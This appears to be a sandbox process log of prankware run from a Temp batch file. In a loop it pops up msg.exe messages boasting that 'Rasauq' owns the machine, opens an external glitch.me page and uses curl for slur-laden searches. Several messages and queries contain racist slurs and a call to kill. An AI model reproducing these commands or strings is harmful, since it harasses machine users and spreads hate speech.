msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7652,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8316,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8332 /prefetch:14

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe

cookie_exporter.exe --cookie-json=1128

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8400,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8392 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7684,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8712 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8712 /prefetch:14

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=8840,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8824 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9016,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9060 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9232 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9380,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9408 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=9884,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9912 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10220,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9920 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10560,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=10612 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10836,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=10868 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=11008,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11044 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11228,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11208 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11404,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11016 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11568,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11600 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11808,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11752 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=11844,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11996 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=12252,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12232 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=12428,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12280 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12596,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12584 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12788,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12768 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp67FC.tmp.bat""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12964,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12992 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=13028,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13172 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13436,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13404 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13644,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13668 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

